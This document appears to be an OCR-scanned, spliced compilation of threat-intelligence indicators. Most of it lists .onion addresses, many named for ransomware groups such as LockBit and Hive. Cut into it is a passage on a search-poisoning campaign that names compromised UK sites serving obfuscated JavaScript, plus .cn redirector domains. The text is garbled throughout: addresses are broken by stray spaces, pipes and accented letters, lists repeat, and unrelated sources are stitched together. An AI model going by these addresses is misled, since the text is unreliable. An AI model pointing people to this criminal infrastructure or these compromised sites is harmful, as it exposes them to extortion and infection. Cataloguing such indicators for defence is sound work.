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http://7iulpt5i6whht6zo2r52f7vptxtjxs3vfcdxxazllikrtqoupn4epnqd.onion 
http://7k4yyskpz3rxq5nyokf6ztbpywzbjtdfanweup3skctcxopmt7tq7eid.onion 
http://7ukmkdtyxdkdivtjad5 7kiqnd3kdsmq6tp45rrsxqnu76zzv3jvitiqd.onion 
http://adminavf4cikzbv6mbbp7ujpwhygnn2t3egiz2pswidj32krrml42wyd.onion 
http://alpbhvmmm27o03abo3r2mIimjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion 
http://anewset3pcya3xvk73hj7yunuamutxxsm5sohkdi32blhmq|I55tvgqad.onion 
http://avosqxh72b5ia23d|5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion 
http://babydovegkmhbontykziyq7qivwzy33mu4ukgefe4mapiiwd3wibnjqd.onion 
http://bianlianlocSan4kgnay30pdemgcryg2kpfcbgczopmm3dnbz3uaunad.onion 
http://blackmax7su6mbwtcyo3xwtpfxpm356jjqrs34y4crcytpw7mifuedyd.onion 
http://blog2hkbm6gogpv2b3uytzi3bj5d5zmc4asbybumjkhughas355janyd.onion 
http://blogxxu75w63ujgarv476otld7cyjkq4yoswzt4ijadkjwvg3vrvd5yd.onion 
http://bonacifryrxr4siz6ptvokuihdzmjzpveruklxumflz5thmkgauty2qd.onion 
http://cartelraqonekult2cxbzzz2ukiff7 vV6cav3w373uuhenybgqulxm5id.onion 
http://ccpyeuptriatb2 piua4ukhnhi7Irxgerrcrj4p2b5uhbzqm2xgdjaqid.onion 
http://ce6roic2ykdjunyzazsxmjpz5wsar4pflpoqzntyww5c2eskcp/7dq4yd.onion 
http://chat5sqrnzqewampznybomgn4hf2m53tybkarxk4sfaktwt7oqpkcvyd.onio n 
http://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion 
http://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si/76icnqd.onion 
http://darksidc3iux462n6yunevoag52ntvwp6wulaz3zirkmh4cnzé6hhj7id.on ion 
http://dfpc7yvle5kxmgg6sbcp5ytggy30e0b676bjgwcwhyr2pwcrmbvoilqd.onion 
http://dg5fyig37abmivryrxlordrczn6d6r5wzcfe2msuo5mbbu2exnu46fid.onion 
http://dlyo7r3n4qy5fzv4645nddjwarj7wjdd6wzckomcyc7akskkxp4glcad.onion 
http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion 
http://ecdmr42a34qovoph557zotkfvth4fsz56twvwgiylstjup4r5bpc4oad.onion 
http://f5uzdubog4fa2xkjloprmctk7ve3dm46ff7aniis66cbekakvksxgeqd.onion 
http://fl3xpz5bmgzxy4fmebhgsbycgnz24u0sp3u4g330iIn627qq3gyw37ad.onion 
http://ft4zr2jziqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmgqnpad.onion 
http://fvki3hj7uxuirxpeop6chgqoczanmebutznt2mkzy6waovéw456vjuid.onion 
http://gamol6n6p2p4c3ad7gxmx3ur7wwdwlywebo2azv3vv5qlmjmole2zbyd.onion 
http://gcbejm2rcjftouqbxuhimj5oroouqcuxb2my4raxqa7efkz5bd5464id.onion 
http://gg5ryfgogainisskdvh4y373ap3b2mxafcibeh2lvq5x7fx76ygcosad.onion 
http://giphvoitymatg4cv7bxqh5dz6sn6bfscywoat4atsiztkomf5lavrayd.onion 
http://griefcameifmv4hfr3auozmovz5yi6m3h3dwbuqw7baomfxoxz4qteid.onion 
http://gvka2m4qt5fod2fltkijmdk4gxh5oxemhpgmnmtjptms6fkgfzdd62tad.onion 
24951 


http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp5 7zoq300qd.onion 
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion 
http://hl66646wtlp2naognhattngigjp5palgqmbwixepcjyq5i534acgqyad.onion 
http://hpoo4dosa3x4ognfxpqcrjwnsigvsIm7kv6hvmhh2yqczaxy3j6qnwad.oni on 
http://joeg2dct2zhku6c2vwnpxtm2psnjo2xnqvvpoiiwr5hxnc6wrp3uhnad.onion 
http://jukswsxbh3jsxuddvidrjdvwuohtsy4kxg2axbppiyclomt2qciyfoad.onion 
http://jvdamsif5 3dqjycuozlaye2s47p7xij4x6hzwzwhzrqmv36gkyzohhqd.onion 
http://kf6x3mjeqljqxjznaw65jixin7dpcunfxbbakwuitizytcpzn4iy5bad.onion 
http://kwvhrdibgmmpkhkidrby4mccwqpds5za6uo2thcw5gz/75qncv/7rbhyad.onion 
http://I5cjga2ksw6rxumu514xxn3cmahhi2irkbwg3amx6ajroyfmfgpfllid.onion 
http://landxxeaf2hoyl2jvcwuazypt6imcsbmhb7kx3x33yhparvtmkatpaad.onion 
http://leaksv7sroztl377bbohzl42i3ddlfsxopcb6355zc7olzigedm5agad.onion 
http://lirncvjfmdhvesamxvvlohfqx 7jklfxoxj7xn3fh7qeabs3taemdsdqd.onion 
http://lockbit7z2jwcskxpbokpemdxmitipntwlkmidcll2qirbu7ykg46eyd.onion 
http://lockbitapt2d 7 3kribewgv27tquljgxr33xbwwspé6rkyieto7u4ncead.onion 
http://lockbitapt2yfbt7Ilchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion 
http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion 
http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion 
http://lockbitapt6vx5 7t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion 
http://lockbitapt72iw55njgnqpymggskg5yp/7/5ry7rirtdg4m7i42artsbqd.onion 
http://lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid.onion 
http://lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd.onion 
http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onio n 
http://lockbitaptq7ephv2o0igdncfhtwhpqgwmgaojnxqdyhprxxfpcllqdxad.onion 
http://lockbitaptstzf3er2Iz6ku3xuifafq2yh5Imigj5ncur6értimkteiqd.onion 
http://lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.on ion 
http://matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd.onion 
http://mhdehvkomeabau/7gsetnsrhkfign4jgnx3wajth5yb5h6kvzbd72wiqd.onion 
http://midasbkic5eyfox4dhnijkzc7v7e4hpmsb2qgux7diqbpna4up4rtdad.onion 
http://mmeeiix2ejdwkmseycljetmpiwebdvgjts 75c63camjofn2cjdoulzqd.onion 
http://moishddxqnpdxpababec6exozpl2yr7idfhdldiz5525a0o25bmasxhid.onion 
http://mrdxtxy6vqeqbmb4rvbvueh2kukb3e3mhu3wdothqn7242gztxyzycid.onion 
http://msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg/7dcvtgtecpumrxpqd.onion 
http://n3twormruynhn30etmxvasum2miix2jgg56xskdoyihra4wthvigyeyd.onion 


http://nalr2uqsave7y2r235am5jsfiklffpA5h4jcSnztu3rzvmhklwt5j6kid.onion 
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ali. zaher.101 main. com??printable-it-40-wy-tax-form 

FEB averder. cwsurf. de/8453-forb2Awadltheleyo. html 
beaver-cub-scout.co.uk/fthard/gls. php?id=free+printable+federalttax+form 
bebbinbears. co. uk/fdrO/dq. php?id=1040ez+printable+income+tax+orm 
britishbaits. com/veretu/page. php? id=printable+state+tx+return+printable+forms 
cancerselfhelp. org. uk/macus/bg. php?id=arkansas+printable+1040+ez+tax+form 
carolineengland. co. uk/after/dn. php?id=mississippitstatet+income+tax+printable+forms 
casanickel.co.uk/Awearm/gp. php?id=2008+printable+1040ez 
catspro-northants. org. uk/uk/dn. php?id=free+printable+1099+misc 
ceiec.co.uk/serve/pags. php?id=oklahoma+printable+income+tax+forms 
cheritontennisclub.co. uk/index/mo. php?id=minnesotatonline+tax+tprintable+schedules 
childrenofthedrone. net/folder/bok. php?id=1040ez+form+printablettax 

chirnside. org. uk/are/gls. php?id=free+printable+1040ez+tax+form 

chris-hillman. com/woww/xre. php?id=1096+printable+tax+form 
chris-hillman-photography.co.uk/texts/bok. php?id=free+printable+oregon-+wills 
christine-pearson.com/shows/bi. php?id=1040ez+form-+printable+tax 
cicatrixonline.co.uk/index/mo. php?id=free+printable+loss+oftwages+form 
cinta.co.uk/softwr/entr. php?id=1099+printable+tax+form 
Mae|classic-pizza.co.uk/cigr/pnm. php?id=2008+misc+printable+tax+form 
crewshillgolfclub.co.uk/fldrO/xrc. php?id=free+printable +w-7 +ax+form+format 
pfa\cs-photo.co.uk/new/typ. php?id=canadian+printablet+income+tax+forms 
PElldak. crep01 linux-site. net/?printable-tax-form-8332 
darkhorsegraphics.co.uk/eng/2mp. php?id=free+printable+irs+form+1040x 
Balldivagoddess. co. uk/tabl/dg. php?id=1040ez+printable+tax+forms 

fet jujas. myftpsite. net/?1040ez-printable-tax-form 

tferh.mi-website.esAwT. htm 


The compromised/misconfigured legitimate sites used in the campaign are serving dynamic 
javascript obfuscations. Here’s a list of ones currently in use: 
ali.zaher.101main .com 
averder.cwsurf .de 
beaver-cub-scout.co .uk 
bebbinbears.co .uk 

britishbaits .com 
cancerselfhelp.org .uk 
carolineengland.co .uk 
casanickel.co .uk 
catspro-northants.org .uk 
ceiec.co .uk 
cheritontennisclub.co .uk 
childrenofthedrone .net 
chirnside.org .uk 

chris-hillman .com 
chris-hillman-photography.co .uk 
christine-pearson .com 
cicatrixonline.co .uk 

cinta.co .uk 

classic-pizza.co .uk 
crewshillgolfclub.co .uk 
cs-photo.co .uk 
dak.crep01.linux-site .net 
darkhorsegraphics.co .uk 
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http://nclen75pwlgebpxpsghIcnxsmdvpyrr7ogz36ehhatfmkvakeyden6ad.onion 
http://ncpbxzcgdeprrbba7dgodmymdewy5/7yokkebuwhmuywiuz5kqjwepbad.onion 
http://ng4zyac4ukl4tykmidbzgdlvabogeqsemkp4t35bzvjeve6zm2Iqcjid.onion 
http://obzuqvr5424kkc4unbq2p2i6 7ny3zngce3tbdr37nicjqesgqcgomfqd.onion 
http://omegalock5zxwbhswbisc4202q2i54vdulyvtqqbudqousisjgc7j7yd.onion 
http://oyarbnujct53bizjguvolxou3rmuda2vr72o0syexngbdkhqebwrzsnad.onion 
http://ozsxj4hwxub7gi0347ac7tyqqozvfioty37skqilzo20qfs4cw2mgtyd.onion 
http://pay2key2zkg7arp3kv3cuugdaqwuesifnbofun4j6yjdw5ry 7zw2asid.onion 
http://pysa2bitc5ldeyfak4seeruqymas4sj5wt5qkcq7aoyg4h2acqieywad.onion 
http://qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.oni on 
http://quantum445bh3gzuyilxdzs5xdepf3b 7|kcupswvkryf3n7hgzpxebid.onion 
http://r6d636w4 7ncnaukrpvihmtdbvbeltc6enfcuuow3jclomyga7cz374qd.onion 
http://ransomocmou6mnbquqz44ewosbkjk305qjsl30rawojexfook2j7esad.onion 
http://ransomwr3tsydeii4q43vazm7wofla5ujdajquitomtd47cxjtfgwyyd.onion 
http://ranswikiif2mir7mnnscyrsvppxmwwarvc43fhtddvtnmhedkj4hopyd.onion 
http://rovuetuneohce3o0uxjloxtimyyxokb4btncxjbo44fbgxqy 7tskinwad.onion 
http://rgleaktxuey67yrgspmhvtnrgqtgogur35|lwdrup4d3igtbm3pupc4lyd.onion 
http://rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5dcs4lt4pdrqqd.onion 
http://rnsm777cdsjrsdibs4v5qoeppu3px6sb2igmh53jzrx7ipcrbjz5b2ad.onion 
http://rwiajgajdr4kzinrj5zwebbukpcbrjhupjmk6gufxv6tg7myx34iocad.onion 
http://santat7kpllt6iyvqbr7q4amdvédzrh6paatvyrzl7ry3zm72zigf4ad.onion 
http://solidb2jco63vbhx4sfimnqmwhtdjk4jbbgq7a24cmzzkfse4rduxgid.onion 
http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion 
http://spyarea2 3ttlty6qav3ecmbclpqym3p32lksanoypvrqm6j5onstsjad.onion 
http://supp24maprinktc 7uizgfyghisx7lkszb60gh6lwdzpac23w3mh4tvyd.onion 
http://sushInty2j7qdzy64qnvyb6ajkwg 7resd3p6agc2widnawodtcedgjid.onion 
http://t2tqvp4pctcr7vxhgz5yd5x4ino5tw 7jzs3whbntxirhp32djhi7q3id.onion 
http://u6 7aylig 7i6165 7wxmp274eoilaowhp3boljowaé6bli63rxyzfzsbtyd.onion 
http://vobfqeh5nugm6r2u2qvghsdxm 3fotf5wbxb5ltv6vw7 7vus5frdpuaiid.onio n 
http://vomisgjshn4yblehk2vbnil53tlqklxsdaztgphcilto3vdj4geao5qd.onion 
http://veqixhq7ub5qze3qy56zx2cig2e6tzsgxdspkubwbayqije6oatma6id.onion 
http://vfokxcdzjbpehgit223vzdzwte4 7|3zcqtafj34qrr26htjo4uf3obid.on ion 
http://vgifktlreqoudvulhbzmc5gocbeawl67uvs2pttswemdorbnhaddohyd.onion 
http://vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad.onion 
http://wavbeudogz6byhnardd2|kp2jafims3j7tj6k6qnywchn2csngvtffqd.onion 
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http://wj3b2wtj 7u2bzup75tzhnso56bin6bnvsxcbwbfcuvzpc4vcixbywlid.onion 
http://wobpitin7 7vdsdiswr43duntv6eqw4rvphedutpaxycjdie6gg3binad.onion 
http://ws3dh6avé6sjbxxkjpw5ao3wqzmtejnkzheswm4dz5rrwvular7xvkqd.onion 
http://x2miyuiwpib2imjr5ykyjngdu7v6vprkkhjltrk4qafymtawey4qzwid.onion 
http://xembshruusobgbvxg4tcjs3jpdnks6xrr6nbokfxadcnic53yxir22ad.onion 
http://xingnewj6m4qytljhfwemngm/7r7rogrindbq/7wrfeepejgxc3bwci/7qd.onion 
http://xqkz2rmrqkeqf6sjbrb47jfwnqxcd402zvaxxzrpbh2piknms37rw2ad.onion 
http://xw7au5pnwtl6lozbsudkmyd32n6gnqdngitidppybudan3x3pjgpmpid.onion 
http://xxz6hl6wwoa25er62tbhjdxda4nxyt5iqziavb 7 3mhda6q6zujsgfoxqd.onion 
http://yeuajcizwytgmrmntijhxphs6wn5txp2prs6rpndafbsapek3zd4ubcid.onion 
http://yq430dyrmzqvyezdindg2tokgogf3pn6bcdtvgczpz5a74tdxjbtk2yd.onion 
http://z6mikrtphid5fmn52nbcbg25tj5 7sowlm3o0c25g563yvsfmygkcxqbyd.onion 
http://Z6wkgghtoawog5noty5nxulmmt2zs7c3yvwr22v4czbffdoly2kl4uad.onion 
http://zeonrefpbompx6rwdqad5hxgtp2cxgfmoymlli3Zazoanisze33pp3x3yd.onion 
http://zj2ex44e2b2xi43m2txk4uwi3l55aglsarre7repw7rkfwpj54j46iqd.onion 
http://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.oni on 
http://zqaflhty5hyziovsxgqvj2mrz5e5rs60qxzb54zolccfnvtnSw2johad.onion 
https://3f7nxkjway3d223j27lyad7v5cgmyaifesycvmwgq/7i7cbs23|b6llryd.onion 
https://aazsbsgya565vlu2c6bzy6yfiebkcbtvvcytvolt33s77xypi7nypxyd.onion 
https://doqg32rjiuomfghm5a4lyf3lwwakt2774tkv4ppsos6ueo5mhx7662gid.onion 
https://Inxxtrqraokn63f3nubhbjrzxkrgduq3qogp3yr424tkpvh3z7n4kcyd.onion 
https://omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vi3li3lfo7saabxazshnead.onion 
https://sbc2zv2qnz5vubwtx3aobfpkeaoél4igjegm3xx7tk5sughjkp5jxtqd.onion 
https://stniiomyjliimcgkvdszvgen3eaaoz55hreqqx6077yvmpwt7gkliffqd.onion 
https://wemo2ysyeq6km2nghcrz63dkdhez3j25yw2nvn7xba2z4h7v/gyrfgid.onion 
http://22rnyep2aa2exx3fdm26p4onwjfmhciodb55v5l3w4iny7e5bxpg3yad.on ion 
http://232fwh5cea3ub6qguz3pynijxfzl2uj3c7 3nbrayipf3gq25vtq2r4qd.onion 
http://2cuqgeerjdba2rhdiviezodpu3lc4qz2sjf4qin6f7std2evleqlzjid.onion 
http://37rckgo66iydpvgpwve7b2el5q2zhjw4tv4imyewufnpx4ihkekxkoqd.onion 
http://3f7nxkjway3d223j27lyad7v5cgmyaifesycvmwq/7i7cbs23lb6liryd.onion 
http://3kp6j22pz3zkv76yutctosaG6djpj4yib2icvdqxucdaxxedumhgqicpad.onion 
http://3nvzqyo6l4wkrzumzu5ao0d7zbosq4ipgf7ifgj3hsvocr5vcasordvqd.onion 
http://3r6n77mpe737w4sbxxxrpc5phbluvéxhtdl5ujpnivmck5tc7blq2rqd.onion 
http://3slz4povugieoi3tw7sblxoowxhbzxeju42 7cffsst5fo2tizepwatid.onion 
http://4qbxi3i20qmyzxsjg4fwe4aly3xkped52gq5orp6efpkeskvchqe27id.onion 
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http://4s4|nfeujzo6 7fy2jebz2dxskez2gsqj2jeb35m 75ktufxensdicqxad.onion 
http://54bb47h5qu4k714d7v5ix3i6ak6elysn3net4by4ihmvrhu7cvbskoqd.onion 
http://54rdhzjzc4ids4u4wata4zr4ywfon5wpz2ml4q3avelgadpvmdal2vqd.onion 
http://Smvifa3xq5m7sou3xzaajfz7h6eserp5fnkwotohns5pgbb5oxty3zad.onion 
http://6iaj3efye3q62xjgfxyegrufhewxew7yt4scxjd45tlfafyja6q4ctqd.onion 
http://746pbrxl7acvrihzshosye3b3udk4plurpxt2pp27pojfhkkaoogqiiqd.onion 
http://7iulpt5i6whht6zo02r52f7vptxtjxs3vfcdxxazllikrtqoupn4epnqd.onion 
http://7k4yyskpz3rxq5nyokf6ztbpywzbjtdfanweup3skctcxopmt7tq7eid.onion 
http://7ukmkdtyxdkdivtjad5 7kiqnd3kdsmq6tp45rrsxqnu76zzv3jvitlqd.onion 
http://7ypnbv3snejqmgce4kbewwvym4cmb5jélkzf2hra2hyhtsvwjaxwipkyd.oni on 
http://aazsbsgya565vlu2c6bzyb6yfiebkcbtvvcytvolt33s77xypi7nypxyd.onion 
http://aby6efzmp7jzbwgidgqc6ghxi2vwpo6d7eaood5xuoxutrfofsmzcjqd.onion 
http://adminavf4cikzbv6émbbp7ujpwhygnn2t3egiz2pswidj32krrml42wyd.onion 
http://alpbhymmm27o03abo3r2mIimjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion 
http://anewset3pcya3xvk73hj7yunuamutxxsm5sohkdi32bIhmq|55tvgqad.onion 
http://aplebzu4 7 wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion 
http://avosqxh72b5ia23d|5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion 
http://babydovegkmhbontykziyq7qivwzy33mu4ukgefe4mapiiwd3wibnjqd.onion 
http://bianlianlocSan4kgnay30pdemgcryg2kpfcbgczopmm3dnbz3uaunad.onion 
http://bl4cktorpms2gybrcyt52aakcxt6yn37byb65uama5cimhifcscngkid.onion 
http://blackmax7su6mbwtcyo3xwtpfxpm356jjqrs34y4crcytpw7 mifuedyd.onion 
http://blog2hkbm6gogpv2b3uytzi3bj5d5zmc4asbybumjkhughas355janyd.onion 
http://blogxxu75w63ujgqarv476otld7cyjkq4yoswzt4ijadkjwvg3vrvd5yd.onion 
http://bonacifryrxr4siz6ptvokuihdzmjzpveruklxumflz5thmkgauty2qd.onion 
http://cartelirsn5|154ehcbalyyqtfb3j7be2rpvf6ujayaf5qqmg3vliwiayd.onion 
http://cartelraqgonekult2cxbzzz2ukiff 7 v6cav3w373uuhenybgqulxm5id.onion 
http://ccpyeuptriatb2 piua4ukhnhi7Irxgerrcrj4p2b5uhbzqm2xgdjaqid.onion 
http://ce6roic2ykdjunyzazsxmjpz5wsar4pflpoqzntyww5c2eskcp/7dq4yd.onion 
http://chat5sqrnzqewampznybomgn4hf2m53tybkarxk4sfaktwt7oqpkcvyd.onio n 
http://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion 
http://crkfkmrh4qzbddfrl2axnkvjp5tgwx73d7lq4oycsfxc7pfgbfhtfiid.onion 
http://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd.on ion 
http://darkleakyqmv62eweqwy4dnhaijg4m4dkburo73pzuqfdumcntqdokyd.onion 
http://darklmmmfuonklpy6s3tmvk5mrcdi7iapaw6eka45esmoryiiuug6aid.onion 
http://darksidc3iux462n6yunevoag52ntvwp6wulaz3zirkmh4cnz6hhj7id.onion 
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http://darktorhvabc652txfc5 750endhykqclib7bh7jhhsjduocdlyzdbmad.onion 
http://dfpc7yvle5kxmgg6sbcp5ytggy30e0b676bjgwcwhyr2pwcrmbvoilqd.onion 
http://dg5fyig3 7abmivryrxlordrczn6d6r5wzcfe2msuo5mbbu2exnu46fid.onion 
http://dlyo7r3n4qy5fzv4645nddjwarj 7wjdd6wzckomcyc7akskkxp4glcad.onion 
http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion 
http://dog32rjiuomfghm5a4lyf3lwwakt2774tkv4ppsos6ueo5mhx7662gid.onion 
http://dreadytofatroptsdj6io7I3xptbet6onoyno2yv7jicoxknyazubrad.onion 
http://ecdmr42a34qovoph557zotkfvth4fsz56twvwgiylstjup4r5bpc4oad.onion 
http://f5uzduboqg4fa2xkjloprmctk7ve3dm46ff7aniis66cbekakvksxgeqd.onion 
http://fireeye62c3da3fnosymmmcaqcty 7rl7cjucpbkzaz2 75a4qs5fgkzhad.onion 
http://fl3xpz5bmgzxy4fmebhgsbycgnz24uo0sp3u4g330iIn62 7qq3gyw37ad.onion 
http://ft4zr2jziqoyob7yg4fcpwyt3 7hox3ajajqnfkdvbfrkjioyunmgqnpad.onion 
http://fvki3hj7uxuirxpeop6chgqoczanmebutznt2mkzy6waov6éw456vjuid.onion 
http://gamol6n6p2p4c3ad7gxmx3ur7wwdwlywebo2azv3vv5qilmjmole2zbyd.onion 
http://gcbejm2rcjftouqbxuhimj5oroouqcuxb2my4raxqa7efkz5bd5464id.onion 
http://gg5ryfgogainisskdvh4y373ap3b2mxafcibeh2|lvq5x7fx76ygcosad.oni on 
http://giphvoitymatg4cv7bxqgh5dz6sn6bfscywoat4atsiztkomf5lavrayd.onion 
http://griefcameifmv4hfr3auozmovz5yi6m3h3dwbuqw7baomfxoxz4qteid.onion 
http://gvka2m4qt5fod2fltkjmdk4gxh5oxemhpgmnmtjptms6fkgfzdd62tad.onion 
http://hiveapi4nyabjdfz2hxdsr7otrcv6zq6m4rk5i2w 7j64irtny4b7vjad.onion 
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp5 7zoq300qd.onion 
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion 
http://hl66646wtlp2naognhattngigjp5palgqmbwixepcjyq5i534acgqyad.onion 
http://npoo4dosa3x4ognfxpqcrjwnsigvsIm7kv6hvmhh2yqczaxy3j6qnwad.onion 
http://joeg2dct2zhku6c2vwnpxtm2psnjo2xnqvvpoiiwr5hxnc6wrp3uhnad.onion 
http://jukswsxbh3jsxuddvidrjdvwuohtsy4kxg2axbppiyclomt2qciyfoad.onion 
http://jvdamsif5 3dqjycuozlaye2s47p7xij4x6hzwzwhzrqmv36gkyzohhqd.onion 
http://kf6x3mjeqljqxjznaw65jixin7dpcunfxbbakwuitizytcpzn4iy5bad.onion 
http://kwvhrdibgmmpkhkidrby4mccwqpds5za6uo2thcw5gz/75qncv7rbhyad.onion 
http://I5cjga2ksw6rxumu514xxn3cmahhi2irkbwg3amx6ajroyfmfgpfllid.onion 
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http://leaksv7sroztl377bbohzl42i3ddlfsxopcb6355zc7olzigedm5agad.onion 
http://lirncvjfmdhvesamxvvlohfqx7jklfxoxj7xn3fh7qeabs3taemdsdqd.oni on 
http://lockbit7z2jwcskxpbokpemdxmltipntwlkmidcll2qirbu7ykg46eyd.onion 
http://lockbit7zZ2mmiz3ryxafn5kapbvbbiywsxwovasfkgf5dqqp5kxlajad.onion 
http://lockbit7z20g4jlsmdy7dzty3g42eu3gh2sx2b6ywtvhrjtss 7li4fyd.onion 
http://lockbit7z3550alq4hiy5p7de64l6rsqutwlvydqje56uvevcc5 7r6qd.onion 
http://lockbit7z36ynytxwjzuoa046ck7b3753gpedary3qvuizn3iczhe4id.onion 
http://lockbit7z3 7ntefjdbjextn6tmdkry4j546ejnru5cejeguitiopvhad.onion 
http://lockbit7z3azdoxdpqxzliszutufbc2fldagztdu47xyucp25p4xtqad.onion 
http://lockbit7z3ddvg5vuez2vznt7 3liqgwx5tnuqaa2ye7Ins742yiv2zyd.onion 
http://lockbit7z3hv7ev5knxbrhsvv2mmu2rddwaizdz4vwfvxt5izrq6zqqd.onion 
http://lockbit7z3ujnkhxwahhjduh5me2updvzxewhhc5qvk2snxezoi5drad.onion 
http://lockbit7z4bsm63m3dagp5xglyacr4z4bwytkvkkwtn6enmuo5fid5iyd.onion 
http://lockbit7z4cgxvictidwfxpuiov4scdw34nxotmbdjyxpkvkg34mykyd.onion 
http://lockbit7Z4k5zer5fboqi2vdq5sx2vuggatwyqvoodrkhubxftyrvncid.onion 
http://lockbit7z4ndl6thsct34yd47jrzdkpnfg3acfvpacuccb45pnars2ad.onion 
http://lockbit7z5 5tuwaflw2c7torcryobdvhkcgvivhflyndyvcrexafssad.onion 
http://lockbit7z5 7mkicfkuq44j6yrpu5finwvjliczkkp2uvdedsdonjztyd.onion 
http://lockbit7z5ehshj6gzpetw5kso3onts6ty 7wrnneya5u4aj3vzkeoaqd.onion 
http://lockbit7z5hwf6ywfuzipoa42tjlmal3x5suuccngsamsgklww2xgyqd.onion 
http://lockbit7z5ltrhzv46lsg44703cx2637dloc3qt4ugd3gr2xdkkkeayd.onio n 
http://lockbit7z6choojah4ipvdpzzfzxxchjbecnmtn4povk6ifdvx2dpnid.onion 
http://lockbit7z6dqziutocr43onmvpth32njp4abfocfauk2belljjpobxyd.onion 
http://lockbit7z6f3gu6rjvrysn5gjbsqj3hk3bvsg64ns6pjldqr2xhvhsyd.on ion 
http://lockbit7z6ginyhhmibvycu5kwmcvgrbpvtztkvvmdce5zwtucaeyrqd.onion 
http://lockbit7z6rzyojiye437jp744d4uwtff7aq7df7gh2jvwaqtv525c4yd.onion 
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divagoddess.co .uk 
fet.jujas.myftpsite .net 
tferh.mi-website .es 


The campaign continues switching between different redirectors parked at 83.133.123.113 for 
instance: 

rondo-trips .cn 

gazsnippets .cn 

besthockeyteams .cn 

allfootballmanager .cn 

rollerskatesadvise .cn 

honda-recycle .cn - used in [5]the previous campaign 

nothern-ireland .cn 

discovernewchina .cn 
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http://lockbitapt2d73kribewgv27tquljgxr33xbwwspé6rkyieto7u4ncead.onion 
http://lockbitapt2yfbt7Ichxejug47kmaqvaqqxvvjpqkmevv4l3azl3gy6pyd.onion 
http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion 
http://lockbitapt5x4zkjbcqmzé6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion 
http://lockbitapt6vx5 7t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion 
http://lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m 7i42artsbqd.onion 
http://lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid.onion 
http://lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd.onion 
http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion 
http://lockbitaptq7ephv2oigdncfhtwhpqgwmgojnxqdyhprxxfpcllqdxad.onion 
http://lockbitaptstzf3er2Iz6ku3xuifafg2yh5Imigj5ncur6rtimkteiqd.onion 
http://lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm 7i6jeetsia3qd.onion 
http://lockbitsupdwon76nzykzbicplixwts4n4zoecugz2bxabtapqvmzqqd.onion 
http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion 
http://lockbitsupo 7vv5vcl3jxpsdviopwvasljqcstym6efhh6oze7céxjad.onion 
http://lockbitsupq3g62dni2f36snrdb4n5qzqvovbtkt5xffw3draxk6gwaqd.onion 
http://lockbitsupqfyacidr6upt6nhhyipujvaablubuevxjéxy3frthvr3yd.oni on 
http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneghoybiniiabj4uwvzapqd.onion 
http://lockbitsupuhswh4izvoucoxsbnotkmgqé6durg7kficg6u33zfvq3oyd.onion 
http://lockbitsupxcjntihbmat4rrh7ktowips2qzywh6zer5r3xafhviyhqd.onion 
http://lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion 
http://matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd.onion 
http://mhdehvkomeabau/7gsetnsrhkfign4jgnx3wajth5yb5h6kvzbd72wliqd.onion 
http://midasbkic5eyfox4dhnijkzc7v7e4hpmsb2qgux7diqbpna4up4rtdad.onion 
http://mmeeiix2ejdwkmseycljetmpiwebdvgjts 75c63camjofn2cjdoulzqd.onion 
http://mrdxtxy6vqeqbmb4rvbvueh2kukb3e3mhu3wdothqn7242gztxyzycid.onion 
http://msaoyrayohnp32tcgwcanhjouetb5k54aekgnwg/dcvtgtecpumrxpqd.onion 
